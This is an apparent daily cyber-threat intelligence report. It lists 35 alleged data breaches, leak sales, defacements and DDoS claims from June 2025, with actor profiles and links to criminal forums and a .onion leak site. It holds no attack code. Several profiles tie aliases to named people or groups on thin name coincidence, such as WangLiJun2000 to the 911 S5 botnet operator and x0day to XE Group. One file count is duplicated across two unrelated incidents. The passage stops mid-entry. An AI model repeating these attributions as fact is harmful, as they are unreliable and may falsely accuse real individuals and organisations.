I. Executive Summary
The past 24 hours have seen a dynamic array of cybersecurity incidents, underscoring the persistent and evolving nature of global cyber threats. Analysis of recent breaches reveals a landscape where financially motivated cybercriminals are increasingly adopting sophisticated methods, while ideologically driven hacktivist groups are expanding their operations, often with geopolitical undertones. Key incidents observed include data exfiltration campaigns targeting critical sectors, ransomware operations shifting towards pure extortion, and large-scale botnet activities enabling widespread fraud.
A significant trend emerging from these incidents is the blurring of traditional distinctions between threat actor motivations. Groups historically driven by political or social agendas are now actively engaging in financially driven activities, such as offering “DDoS-for-hire” services or launching their own cryptocurrencies.1 This convergence suggests that ideological objectives are increasingly intertwined with the need for operational funding or personal enrichment, creating a hybrid threat model that demands a multi-faceted defense strategy.
Furthermore, some financially motivated actors are demonstrating capabilities traditionally associated with advanced persistent threat (APT) groups. These actors are moving beyond opportunistic “low-hanging fruit” attacks, employing sophisticated techniques like identity system abuse, cloud exploitation, and complex social engineering tactics.3 This elevation in capability means that organizations must prepare for financially driven attacks that are as intricate and resource-intensive as those from nation-state adversaries.
II. Daily Incident Overview
The following table summarizes the significant cybersecurity incidents reported in the last 24 hours, providing a high-level overview of the affected entities, attack types, and identified threat actors.
| Incident ID | Victim Organization | Attack Type | Data Compromised | Threat Actor(s) | Date/Time of Discovery |
| INC20250624-001 | Dr. Ambedkar Institute of Management Studies & Research (DAIMSR) | Data Breach | Database | Cyber Regulation Organization | 2025-06-24T12:53:45Z |
| INC20250624-002 | Unidentified WordPress WooCommerce-based Diet Coaching website | Initial Access | Unauthorized access | SammyWalt | 2025-06-24T12:41:07Z |
| INC20250624-003 | Early cryptocurrency whales | Data Breach | Contact details, account credentials, wallet-related metadata | Asipati | 2025-06-24T12:35:53Z |
| INC20250624-004 | Unidentified WordPress WooCommerce-based pet food shop | Initial Access | Unauthorized access | SammyWalt | 2025-06-24T12:06:19Z |
| INC20250624-005 | JobInfo | Data Breach | 50,000 classified job records, sensitive files tied to drone warfare programs | Handala Hack | 2025-06-24T12:02:27Z |
| INC20250624-006 | Unspecified Mexican entities | Data Leak | Over 200,000 driving licenses, KYC details, photo/video selfies, user locations | x0day | 2025-06-24T11:55:38Z |
| INC20250624-007 | Debowae Village Government | Defacement | Website defacement | BABAYO EROR SYSTEM | 2025-06-24T11:51:46Z |
| INC20250624-008 | Taiwan’s Ministry of National Defense | Data Breach | Sensitive military personnel information (names, ranks, unit assignments, contact details) | Jetimbek | 2025-06-24T11:48:43Z |
| INC20250624-009 | SSI Securities Corporation | Data Breach | Full name, citizen identification number, year of birth, phone number, address, exchange code, amount of money, securities account number | giorggios | 2025-06-24T11:18:49Z |
| INC20250624-010 | Chinese users | Alert (Data Leak) | Over 4 billion records (social media, financial, employment, government-related information) | WangLiJun2000 | 2025-06-24T11:15:43Z |
| INC20250624-011 | Defense Visual Information Distribution Service (DVIDS) | Data Breach | Full name, Social Security number, grade/rank, last known duty station, member/serial number, date of birth | DigitalGhost | 2025-06-24T10:54:28Z |
| INC20250624-012 | Australian client database | Data Leak | Over 24,000 records including Medicare details, passports, driving licenses | Hackermanzorro | 2025-06-24T10:43:24Z |
| INC20250624-013 | Myrtue Medical Center | Data Breach | 1.2 TB of data, including 806,625 files | Worldleaks | 2025-06-24T09:27:59Z |
| INC20250624-014 | Pengadilan Agama Krui | Defacement | Website defacement | WOLF CYBER ARMY | 2025-06-24T08:08:43Z |
| INC20250624-015 | Medpocket (Prosoft Creative Software Solutions) | Data Breach | Complete database | Cyber Fattah Team | 2025-06-24T07:38:40Z |
| INC20250624-016 | Health products for the elderly in Malaysia | Data Leak | 190,000 records including ID card information | Market Exchange | 2025-06-24T05:34:39Z |
| INC20250624-017 | LeakNation VPS | Initial Access | Access to offshore VPS infrastructure (no KYC, full root access, allows hacking/scanning) | 303security | 2025-06-24T05:19:31Z |
| INC20250624-018 | UAE’s vital infrastructure | Alert (DDoS Attack) | Service disruption | TEAM FEARLESS | 2025-06-24T04:51:48Z |
| INC20250624-019 | UAE’s vital infrastructure | Alert | Unspecified | Dark Storm Team | 2025-06-24T04:44:25Z |
| INC20250624-020 | 160 Turkish Online Casino Platforms | Data Breach | Member information | markosic | 2025-06-24T04:14:11Z |
| INC20250624-021 | Malaysian senior citizen database | Data Leak | 180,000 Malaysian senior members aged over 50 | Market Exchange | 2025-06-24T04:11:53Z |
| INC20250624-022 | Malaysian investors | Data Leak | 130,000 wealthy Malaysian investors | Market Exchange | 2025-06-24T03:55:27Z |
| INC20250624-023 | Malaysian individuals associated with health products | Data Leak | 200,000 records including ID card information | Market Exchange | 2025-06-24T03:48:53Z |
| INC20250624-024 | CETDIGIT | Data Breach | 19.2 million B2B records (full names, business emails, job titles, company names, addresses, phone numbers) | morse | 2025-06-24T02:52:19Z |
| INC20250624-025 | X (formerly Twitter) | Data Breach | Over 200 million email and password combinations | bx1 | 2025-06-24T02:44:56Z |
| INC20250624-026 | Hospital Civil de Guadalajara | Data Breach | 33,358 files (7.6 GB) of sensitive hospital-related records | kazu | 2025-06-24T02:31:02Z |
| INC20250624-027 | Ministry of Agriculture of the Republic of Indonesia | Data Breach | 8,438 millennial and “andalan” farmers (personal and business information, NIK, addresses, birth details, phone numbers, emails, ID/passport photos, agricultural subsectors, income, loan involvement) | KEDIRISECTEAM | 2025-06-24T02:20:37Z |
| INC20250624-028 | Direktorat Jenderal Kependudukan dan Pencatatan Sipil (Dukcapil Indonesia) | Data Breach | Name, address, age, date of birth | HIME666 | 2025-06-24T02:13:05Z |
| INC20250624-029 | Malaysia visa data | Data Leak | Malaysia visa data | HIME666 | 2025-06-24T01:35:00Z |
| INC20250624-030 | Malaysia Airlines | Data Breach | 210,000 First Class customers, including passport details | Market Exchange | 2025-06-24T01:15:43Z |
| INC20250624-031 | Individuals in UK and USA | Data Leak | 1,500 credit card and bank records | Octo Dark Cyber Squad(Official) | 2025-06-24T00:56:47Z |
| INC20250624-032 | CGI India | Data Breach | Name, email, city, phone | HIME666 | 2025-06-24T00:49:54Z |
| INC20250624-033 | Federal Bureau of Investigation (FBI) | Data Breach | Personal information of FBI leadership (addresses, sensitive details) | uralxploitvhem | 2025-06-24T00:48:57Z |
| INC20250624-034 | LuxService | Data Breach | Personal information of users (full names, email addresses, phone numbers, home addresses) | RXY | 2025-06-24T00:19:31Z |
| INC20250624-035 | Al Moasher Business (ERP & CRM) | Data Breach | Complete 46 GB dataset (33,358 files) | HIME666 | 2025-06-24T00:10:13Z |
III. In-Depth Incident Analysis & Threat Actor Profiles
This section provides a detailed analysis of each reported incident, including comprehensive profiles of the associated threat actors, their methodologies, and the broader implications of their activities.
Incident INC20250624-001: Alleged data breach of Dr. Ambedkar Institute of Management Studies & Research
Incident Details:
The Cyber Regulation Organization claims to have obtained the database of Dr. Ambedkar Institute of Management Studies & Research (DAIMSR) in India. This incident highlights the vulnerability of educational institutions to data breaches, which can expose sensitive personal and academic information.
Threat Actor Profile: Cyber Regulation Organization
The term “Cyber Regulation Organization” in the context of a threat actor claiming a breach is unusual, as it typically refers to legitimate entities involved in cybersecurity investigations and regulation, such as the U.S. Secret Service’s Cyber Investigative Section or the Cybersecurity and Infrastructure Security Agency (CISA).4 These organizations are dedicated to combating cybercrime, disrupting transnational cybercrime networks, and safeguarding critical infrastructure and financial systems.5 They work to prevent, detect, mitigate, and investigate cyberattacks through partnerships with law enforcement, private industry, and academia.5 Given this, it is highly probable that “Cyber Regulation Organization” is a self-proclaimed, misleading, or ironic moniker used by a malicious actor, rather than a genuine regulatory body engaging in illicit activities. Specific threat intelligence on a malicious group operating under this exact name is not available in the provided research.
Associated Resources:
- Published URL: https://t.me/CRO_official_BD/34
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/2a077560-7cfd-4290-a0a7-6798f741059e.png
Incident INC20250624-002: Alleged sale of unauthorized access to an online Diet Coaching site in Netherlands
Incident Details:
A threat actor named SammyWalt claims to be selling unauthorized access to an unidentified WordPress WooCommerce-based Diet Coaching website operating in the Netherlands. This type of incident, involving the sale of initial access, is a common precursor to more significant attacks, such as data exfiltration or ransomware deployment.
Threat Actor Profile: SammyWalt
Specific threat intelligence on a malicious actor or group named “SammyWalt” is not available in the provided research.9 This name may represent an individual actor, a temporary alias, or a less prominent entity within the cybercrime ecosystem.
Associated Resources:
- Published URL: https://forum.exploit.in/topic/261363/?tab=comments#comment-1576779
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/45bbb474-58d2-4b5d-b64b-e32b92b30190.png
Incident INC20250624-003: Alleged data sale of UHQ Early crypto whales
Incident Details:
The threat actor Asipati claims to be selling a database allegedly containing the data of early cryptocurrency whales. The compromised information reportedly includes contact details, account credentials, and wallet-related metadata linked to high-value early investors. This type of data is highly valuable for financial fraud and targeted attacks.
Threat Actor Profile: Asipati
Specific threat intelligence on a malicious actor or group named “Asipati” is not available in the provided research.10 The name appears in contexts related to general cybercrime discussions or law enforcement efforts against cybercrime, such as INTERPOL’s Asia and South Pacific Joint Operations on Cybercrime (ASPJOC).11 This suggests “Asipati” might be an individual or an ephemeral alias rather than a well-documented threat group.
Associated Resources:
- Published URL: https://darkforums.st/Thread-Selling-UHQ-Early-crypto-whales-data
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/9729f0e5-9d00-4acf-aecd-7704d57bb79a.png
Incident INC20250624-004: Alleged sale of unauthorized access to a Pet food shop in Malta
Incident Details:
A threat actor named SammyWalt claims to be selling access to a WordPress WooCommerce-based pet food shop operating in Malta (EU). The store reportedly runs on WordPress and handles online sales of pet supplies. Similar to the previous incident, this is an initial access sale, indicating potential for further malicious activity.
Threat Actor Profile: SammyWalt
As noted previously, specific threat intelligence on a malicious actor or group named “SammyWalt” is not available in the provided research.9 This name may represent an individual actor, a temporary alias, or a less prominent entity within the cybercrime ecosystem.
Associated Resources:
- Published URL: https://forum.exploit.in/topic/261362/?tab=comments#comment-1576776
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/a4f920ca-70d1-4ac7-bd60-faa0b367a339.png
Incident INC20250624-005: Alleged Leak of JobInfo Data
Incident Details:
The Handala Hack group claims to have breached JobInfo, gaining access to sensitive files tied to personnel involved in drone warfare programs like Project Hermes. The compromised data reportedly includes 50,000 classified job records of individuals linked to Zionist military-security operations. This incident highlights the targeting of human resources and defense-related entities for politically motivated data exfiltration.
Threat Actor Profile: Handala Hack
Handala Hack, also known as Handala Hacking Team, is a pro-Palestinian hacktivist group that has been active since at least December 2023.10 The group heavily targets Israeli organizations and those supporting them, using the character “Handala” as a symbol of Palestinian identity and defiance across their social media accounts.10 Their motivations are deeply rooted in the Israel-Iran cyber conflict, aiming to disrupt “systems of occupation and disinformation” and spread anti-Israel narratives.14
Handala Hack employs a wide range of sophisticated tactics, including data theft, phishing (including SMS), extortion, website defacement, and destructive attacks leveraging custom wiper malware that targets both Windows and Linux environments.10 They opportunistically create phishing campaigns using advanced social engineering techniques, often masquerading as legitimate organizations.10 The group has claimed responsibility for leaking hundreds of thousands of documents from Israeli firms, including alleged military fuel supply ties and internal databases, and a major breach of the Weizmann Institute, claiming to have stolen terabytes of classified research.14 They also allegedly compromised TBN Israel and Mor Logistics Ltd, leaking significant volumes of data.14 Handala Hack’s activities tend to escalate during periods of high geopolitical tension, and they have issued warnings signaling future targets in the finance sector.14
Associated Resources:
- Published URL: https://t.me/handala_hack27/5
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/15f7cab0-0d1a-4786-bef6-2f0b1c0c557a.png
- https://d34iuop8pidsy8.cloudfront.net/852d84ce-904d-4786-8875-fc8e06486075.png
Incident INC20250624-006: Alleged sale of driving license and KYC data from Mexico
Incident Details:
The threat actor x0day is offering to sell over 200,000 records sourced from Mexico, containing driving licenses, KYC (Know Your Customer) details, high-quality photo/video selfies, user locations, and other sensitive personal information. This type of data is highly valuable for identity theft and various forms of fraud.
Threat Actor Profile: x0day (XE Group)
The threat actor “x0day” is likely an alias for XE Group, a Vietnam-based cybercriminal organization that has been active for over a decade.15 The name “x0day” itself references their capability to exploit zero-day vulnerabilities.16 XE Group has significantly evolved its capabilities from initial credit-card skimming operations to exploiting zero-day vulnerabilities and maintaining long-term persistence within compromised networks.15 Their primary motivation is financial gain, achieved through sophisticated data theft and maintaining covert access.15
Initially, XE Group exploited known vulnerabilities to deploy webshells for payment data theft.15 By 2024, they shifted to targeted information theft, exploiting zero-day vulnerabilities in supply chain management software.15 Their ability to reactivate webshells planted years prior and maintain access for over four years demonstrates a remarkable level of patience and operational discipline, indicating a strategic goal beyond immediate monetization, possibly for intelligence gathering or future large-scale operations.15 This blurs the lines between advanced cybercrime and nation-state APTs, as such capabilities are typically associated with highly resourced state-sponsored actors.15 XE Group utilizes native Microsoft Windows utilities and PowerShell scripts to load Meterpreter malware, demonstrating a “living off the land” approach to evade detection.15
Associated Resources:
- Published URL: https://forum.exploit.in/topic/261361/?tab=comments#comment-1576773
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/daaba324-d845-46b1-8967-74b6834f3274.png
Incident INC20250624-007: BABAYO EROR SYSTEM targets the website of Debowae Village Government
Incident Details:
The group BABAYO EROR SYSTEM claims to have defaced the website of Debowae Village Government in Indonesia. Website defacement is a common tactic used by hacktivist groups to spread messages, demonstrate capabilities, or simply cause disruption.
Threat Actor Profile: BABAYO EROR SYSTEM
Specific threat intelligence on a malicious actor or group named “BABAYO EROR SYSTEM” is not extensively detailed in the provided research.18 However, the act of website defacement aligns with common hacktivist activities, which often involve using computer code to expose information, destroy data, or disrupt operations.21 Hacktivists may operate anonymously, sometimes in groups, and use various tools to carry out their operations.22 While the specific motivations for this group are not provided, hacktivism is often driven by political, social, or religious ideals.21
Associated Resources:
- Published URL: https://t.me/CyberBabayoEror/496
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/7a1c81a9-f069-4b08-ab98-28c99af206fa.png
Incident INC20250624-008: Alleged database sale of Taiwan’s Ministry of National Defense
Incident Details:
The threat actor Jetimbek claims to be selling a database allegedly belonging to Taiwan’s Ministry of National Defense. The compromised data reportedly includes sensitive military personnel information, such as names, ranks, unit assignments, and contact details. This is a significant national security incident, potentially involving state-sponsored espionage or intelligence gathering.
Threat Actor Profile: Jetimbek
Specific threat intelligence on a malicious actor or group named “Jetimbek” is not available in the provided research.25 However, the name “Jetimbek” appears in the context of a Department of Justice press release about charging members of the “FIN9” cybercrime group.25 FIN9 is described as a sophisticated international cybercrime group that has caused tens of millions in losses by using phishing campaigns and supply chain attacks to steal non-public information, employee benefits, and funds.25 While “Jetimbek” is not explicitly identified as a member of FIN9, the association in the provided data suggests a connection to financially motivated cybercrime, potentially involving data theft for resale.
Associated Resources:
- Published URL: https://darkforums.st/Thread-Selling-%E2%9C%85%E2%9C%85-Taiwan-military-databases-%E2%9C%85%E2%9C%85
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/4a8c424c-3f20-42c5-ab77-0a736e49532d.png
Incident INC20250624-009: Alleged data leak of SSI Securities Corporation
Incident Details:
The threat actor giorggios claims to have leaked the data of SSI Securities Corporation in Vietnam. The compromised data includes full name, citizen identification number, year of birth, phone number, address, exchange code, amount of money, and securities account number. This is a significant breach impacting the financial services sector.
Threat Actor Profile: giorggios
Specific threat intelligence on a malicious actor or group named “giorggios” is not available in the provided research.27 The name is mentioned in a daily cybersecurity threat report in the context of an “alleged breach of Indonesian delivery records,” suggesting an individual or group involved in data theft, likely for financial gain.28 However, no detailed profile or specific attack methods are attributed to “giorggios” beyond general data theft activities.
Associated Resources:
- Published URL: https://darkforums.st/Thread-Selling-VIETNAM-online-trading-platform-SSI-Securities-Corporation-9-million-users
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/4b520695-511c-4c81-be36-11dc72eb3594.png
Incident INC20250624-010: Alleged leak of 4 Billion Chinese Personal Records
Incident Details:
A threat actor on a hacking forum, WangLiJun2000, is discussing a recent data breach reportedly involving over 4 billion records of Chinese users. Researchers describe this as “the largest single-source leak of Chinese personal data ever identified,” allegedly including social media, financial, employment, and government-related information. The user is seeking access to the data from others in the forum.
Threat Actor Profile: WangLiJun2000 (Yunhe Wang)
“WangLiJun2000” is associated with Yunhe Wang, a 35-year-old Chinese national arrested for allegedly running the “911 S5” botnet, described as one of the world’s largest cybercrime botnets.29 Active since at least 2014, Wang amassed approximately $99 million in profits by reselling access to this vast network of compromised Windows computers to other criminals.29 This operation highlights the immense scale of cybercrime infrastructure and how large-scale compromised networks are rented out to facilitate a wide range of illicit activities, underpinning a vast criminal ecosystem.29
The botnet’s reach enabled criminals to steal billions of dollars from financial institutions and federal lending programs, with over half a million fraudulent unemployment insurance claims originating from compromised IP addresses.29 Wang managed this extensive infrastructure through 150 dedicated servers and used his illicit gains to purchase 21 properties across multiple countries, demonstrating the significant financial returns associated with providing such illicit services.29 This case underscores the interconnectedness of various cybercriminal activities and the crucial role of specialized service providers within this ecosystem.
Associated Resources:
- Published URL: https://darkforums.st/Thread-%E2%80%9Cthe-largest-single-source-leak-of-Chinese-personal-data-ever-identified-%E2%80%9D
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/dbcf21fa-fcb4-4979-bb42-b592d486fbd2.png
Incident INC20250624-011: Alleged data breach of Defense Visual Information Distribution Service (DVIDS)
Incident Details:
The threat actor DigitalGhost claims to have breached the data of the Defense Visual Information Distribution Service (DVIDS) in the USA. The compromised data includes full name, Social Security number, grade or rank, last known duty station, member or serial number (for Air Force), and date of birth (for Air Force). This is a significant breach of military-related personal information.
Threat Actor Profile: DigitalGhost (GhostSec)
“DigitalGhost” is an alias for GhostSec, an organized hacktivist group with ties to the Anonymous collective.30 GhostSec gained prominence for operations against ISIS in 2015 and has participated in numerous campaigns targeting enterprises, banks, and governments under the pretense of defending human rights.30 Their activities, often broadcast on Twitter and Telegram, include DDoS attacks, system intrusion, webpage defacement, and data leaks.30
Notably, in late July 2022, GhostSec announced a shift from an ideological hacktivist group to a financially motivated cyber mafia, launching a subscription-based Telegram channel with the statement “Hacktivism does not pay the bills!”.30 This explicit shift highlights a profound trend where even ideologically driven groups seek monetization to sustain operations or enrich members. The group’s internal split, with some members forming “Ghost Security Group” to collaborate with government agencies, illustrates the fluid and often fractured nature of hacktivist groups.30
Associated Resources:
- Published URL: https://darkforums.st/Thread-15-836-727-US-ARMY-DATA
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/616bf47c-b3db-4056-987e-79add029566c.png
Incident INC20250624-012: Alleged sale of Australian client database
Incident Details:
The threat actor Hackermanzorro is offering to sell a database containing over 24,000 records from an Australian client database. The exposed data includes Medicare details, passports, and driving licenses. This is a significant data leak, highly valuable for identity theft and fraud.
Threat Actor Profile: Hackermanzorro
Specific threat intelligence on a malicious actor or group named “Hackermanzorro” is not available in the provided research.32 This name may represent an individual actor or a less prominent entity within the cybercrime landscape.
Associated Resources:
- Published URL: https://forum.exploit.in/topic/261355/
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/3eef0d3b-1ab8-41cd-bd18-8dedb36090b7.png
Incident INC20250624-013: Alleged data breach of Myrtue Medical Center
Incident Details:
The group Worldleaks claims to have breached 1.2 TB of data, including 806,625 files, from Myrtue Medical Center in the USA. This incident highlights the vulnerability of the healthcare sector to large-scale data breaches, which can have severe consequences for patient privacy and operational integrity.
Threat Actor Profile: Worldleaks
World Leaks emerged in early 2025 as a new extortion platform, launched by the operators previously associated with the Hunters International ransomware group.33 This strategic pivot from traditional double extortion (encryption plus data theft) to an “extortion-only” model was driven by increased risks and reduced profitability in the conventional ransomware landscape.33 The group’s primary motivation is financial gain through data exfiltration and the subsequent threat of public disclosure.33
World Leaks operates as an “Extortion-as-a-Service” (EaaS) platform, providing affiliates with tools, including a self-developed exfiltration utility, to automate data theft.33 While the group claims to be extortion-only, investigations have revealed instances where victims still experienced ransomware deployment, indicating collaborations with other ransomware groups like Secp0.33 This suggests that the EaaS model may attract a wider range of threat actors, potentially leading to varied attack outcomes for victims. The group employs a highly professionalized and structured business model, utilizing four distinct platforms to conduct its operations, including a main data leak site (DLS), a negotiation site (victim panel), an “Insider” platform for journalists, and an affiliate panel.33 This operational sophistication, complete with elements like a support chat and psychological tactics to create urgency and fear, mirrors legitimate Software-as-a-Service (SaaS) operations, demonstrating a calculated approach to maximizing illicit profits.33
Associated Resources:
- Published URL: https://worldleaksartrjm3c6vasllvgacbi5u3mgzkluehrzhk2jz4taufuid.onion/companies/7731149748
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/6a6bb851-072f-4f0f-8a7d-d227c08fe40a.png
- https://d34iuop8pidsy8.cloudfront.net/cb613785-49a8-4d90-9718-078aed69e887.png
Incident INC20250624-014: WOLF CYBER ARMY targets the website of Pengadilan Agama Krui
Incident Details:
The threat actor WOLF CYBER ARMY claims to have defaced the website of Pengadilan Agama Krui, a legal services entity in Indonesia. This is another instance of website defacement, often used by hacktivist groups to make a statement or demonstrate their capabilities.
Threat Actor Profile: WOLF CYBER ARMY
Specific threat intelligence on a malicious actor or group named “WOLF CYBER ARMY” is not extensively detailed in the provided research.35 However, the name suggests a hacktivist group, and their activity aligns with common hacktivist tactics such as website defacement.36 Hacktivist groups are often politically, socially, or religiously motivated and may coordinate efforts to amplify attacks against shared adversaries.36 They can employ various methods, including DDoS attacks, data leaks, and defacements, to disrupt services and erode public trust.36 While some hacktivists operate as “lone wolves,” others are part of organized groups.22
Associated Resources:
- Published URL: https://t.me/c/2678983526/136
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/a3da79ba-fbcc-46ea-8e0f-2167e3b2f093.png
Incident INC20250624-015: Alleged database sale of Medpocket
Incident Details:
The threat actor Cyber Fattah Team claims to be selling a complete database of Medpocket, a healthcare and pharmaceuticals entity in Syria. This incident involves the sale of sensitive healthcare data, which can be used for various malicious purposes, including fraud or targeted attacks.
Threat Actor Profile: Cyber Fattah Team
The Cyber Fattah Team is a pro-Iranian hacktivist group deeply involved in geopolitical cyber conflicts, primarily targeting entities perceived as adversaries of Iran, including the United States, Israel, and Saudi Arabia.40 The group’s actions are explicitly linked to broader information operations designed to spread anti-US, anti-Israel, and anti-Saudi narratives and sow insecurity across the region.40 This highlights how nation-states leverage hacktivist groups as proxies to conduct cyber warfare and influence operations, blurring the lines between traditional state-sponsored espionage and public-facing hacktivism.40
Cyber Fattah operates under the alias “Iranian Cyber Team” and maintains close collaborations with other groups such as 313 Team, LulzSec Black, and Cyber Islamic Resistance.40 They are also a member of the “Holy League,” a conglomerate of hacktivists targeting Israel, and have cooperated with groups like CyberVolk, which targets NATO countries.40 Their history includes attacks on Israeli solar energy companies and defacements referencing figures like Hassan Nasrallah of Hezbollah.40 The group’s attack methods primarily involve data exfiltration, often through vulnerabilities like unauthorized phpMyAdmin access, followed by public data leaks.40 They frequently announce their breaches on their official Telegram channel, strategically timing these disclosures to amplify geopolitical events.40 The use of “burner profiles” like ‘ZeroDayX’ on dark web forums to release stolen data is a common tactic to obscure direct attribution and maintain plausible deniability.40
Associated Resources:
- Published URL: https://t.me/fattah_iriii/743
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/c7133070-b225-4918-bbb5-7f0fcfb09859.png
Incident INC20250624-016: Alleged database leak of Health products for the elderly in Malaysia
Incident Details:
The threat actor Market Exchange is offering to sell a database containing over 190,000 records from Malaysia, related to health products for the elderly, including ID card information. This is a significant data leak, potentially impacting a vulnerable demographic.
Threat Actor Profile: Market Exchange
The term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.
Associated Resources:
- Published URL: http://mxxxxxxxs4uqwd6cylditj7rh7zaz2clh7ofgik2z5jpeq5ixn4ziayd.onion/pc/goods_view.php?parameter=1f7bvbKjl6qQGBrI9ebOOGas1BR-BR1chodLJAWzA1ww4T9FOYCF8syY5riQGLWtwj8Wor4wA7akaZdINzdLCN93sWlSnTMIImekbxZPkzguYqEQFSPliuLlOobYQUeN4IWpmweAp6R_lMo3Li9NgL2dwupLbz86XjtsFjtR7P07evtXiNV5Y6cVKvBi6aR95BUBLPBGZvPlUmCbz9VB8hA
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/e9ba3eae-4e5e-4876-9d3f-0fbb1da1c4ac.png
Incident INC20250624-017: Alleged Sale of Access to LeakNation VPS
Incident Details:
The threat actor 303security claims to be selling initial access to offshore VPS infrastructure via the LeakNation forum. The servers reportedly come with no KYC (Know Your Customer), full root access, and explicitly allow hacking and scanning. This type of offering facilitates further cybercriminal activities by providing anonymous infrastructure.
Threat Actor Profile: 303security
The threat actor “303security” is likely an alias for “303,” a name linked to prior breaches, including an alleged infiltration of an Indian software firm in late 2024 that impacted several major insurance providers.46 This pattern suggests a potential ongoing campaign targeting large corporations and critical infrastructure across various sectors.46 While specific motivations for their activities are not always explicitly detailed, the nature of their alleged leaks, such as GitHub credentials and proprietary source code from Deloitte, points towards objectives that could include intellectual property theft, enabling further supply chain vulnerabilities, or setting the stage for future ransomware exploitation.46 It is important to note that “303 Security” also refers to a Linux Professional Institute certification (LPIC-3), which can cause ambiguity in threat intelligence.47
Associated Resources:
- Published URL: https://forum.exploit.in/topic/261348/
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/b330d1d7-fe3c-42fd-b292-75524f7b8703.png
Incident INC20250624-018: TEAM FEARLESS claims to target UAE
Incident Details:
A recent post by the group TEAM FEARLESS indicated that they are targeting UAE’s vital infrastructure using a DDoS attack. This highlights the use of cyberattacks for geopolitical purposes, aiming to disrupt critical services.
Threat Actor Profile: TEAM FEARLESS
Team Fearless is identified as one of 65 pro-Iran hacktivist groups involved in the Israel-Iran cyber conflict.14 They are part of a visible alliance of pro-Palestinian and anti-Israel hacktivist groups, predominantly from South Asia, whose activity tends to rise during high-tension periods.14 While specific details on their history or typical attack methods are not extensively provided, they have been mentioned in the context of amplifying warnings about cyberattacks against the U.S. if it joined the war against Iran, suggesting potential coordination and escalation in response to geopolitical developments.48 Future actions from such groups may include destructive wiper malware, ransomware claims for financial support, and disruptive intrusions into operational technology (OT) systems like water, fuel, or power grids, and exploitation of PLCs and SCADAs.14 This indicates a dangerous escalation towards critical infrastructure targets, with potentially severe real-world consequences beyond data theft or financial loss.14
Associated Resources:
- Published URL: https://t.me/c/2525497429/493
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/3153a5da-8be5-4dab-bb18-6464e4d9e303.png
- https://d34iuop8pidsy8.cloudfront.net/6494386f-3a26-495a-9c40-fc7881153c98.png
Incident INC20250624-019: Dark Storm Team claims to target UAE
Incident Details:
A recent post by the group Dark Storm Team indicated that they are targeting UAE’s vital infrastructure. While the specific type of attack is not detailed in this alert, it aligns with their history of politically motivated cyberattacks.
Threat Actor Profile: Dark Storm Team
Dark Storm Team is a hacktivist group that emerged in September 2023, primarily driven by pro-Palestinian and anti-NATO narratives.1 The group blends ideology with opportunism, often leveraging claims of cyberattacks on high-profile targets to advertise their “DDoS-for-hire” services and monetize mainstream social media attention.1 This dual motivation—political and financial—is exemplified by their launch of a “DARKSTORM Solana cryptocurrency coin” after claiming responsibility for an X (formerly Twitter) outage.1 This highlights the increasing intertwining of hacktivism with cybercrime and the use of cryptocurrencies for funding and monetization.
Dark Storm is primarily known for executing large-scale DDoS attacks against government, defense, transportation, education, financial, media, and technology sectors.49 Their operations, which lead to widespread service disruptions and reputational damage, are organized and amplified through Telegram channels and dark web forums, where they share attack playbooks and recruit participants.49 For anonymity and resilience, they employ VPNs, proxy chains, and botnet networks.49 While they frequently claim responsibility for major outages, such as those affecting X, Zoom, and Spotify in early 2025, analysis has shown they sometimes overstate the impact of their attacks.1
Associated Resources:
- Published URL: https://t.me/darkstormteam21/119
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/66282d21-72cc-4f39-bc4a-1a1379ea69b1.png
Incident INC20250624-020: Alleged Data Breach of 160 Turkish Online Casino Databases
Incident Details:
The threat actor markosic is claiming to have breached and obtained member information from 160 different Turkish online casino platforms. This incident highlights the targeting of the gambling industry for financial gain, as member information can be used for various fraudulent activities.
Threat Actor Profile: markosic
Specific threat intelligence on a malicious actor or group named “markosic” is not available in the provided research.32 This name may represent an individual actor or a less prominent entity within the cybercrime landscape.
Associated Resources:
- Published URL: https://kittyforums.to/thread/147
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/aca81a8d-b5bf-4a8c-80e3-0070ed9493fd.jpg
- https://d34iuop8pidsy8.cloudfront.net/a0fbe2c8-ca98-4d02-ac73-8aa0d33c646f.jpg
- https://d34iuop8pidsy8.cloudfront.net/79a371a2-a27c-4a59-be93-26da0e124eb3.jpg
Incident INC20250624-021: Alleged leak of Malaysian senior citizen database.
Incident Details:
The threat actor Market Exchange claims to be selling a database of 180,000 Malaysian senior members aged over 50. This is a significant data leak, potentially impacting a vulnerable demographic and raising concerns about identity theft and targeted scams.
Threat Actor Profile: Market Exchange
As noted previously, the term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.
Associated Resources:
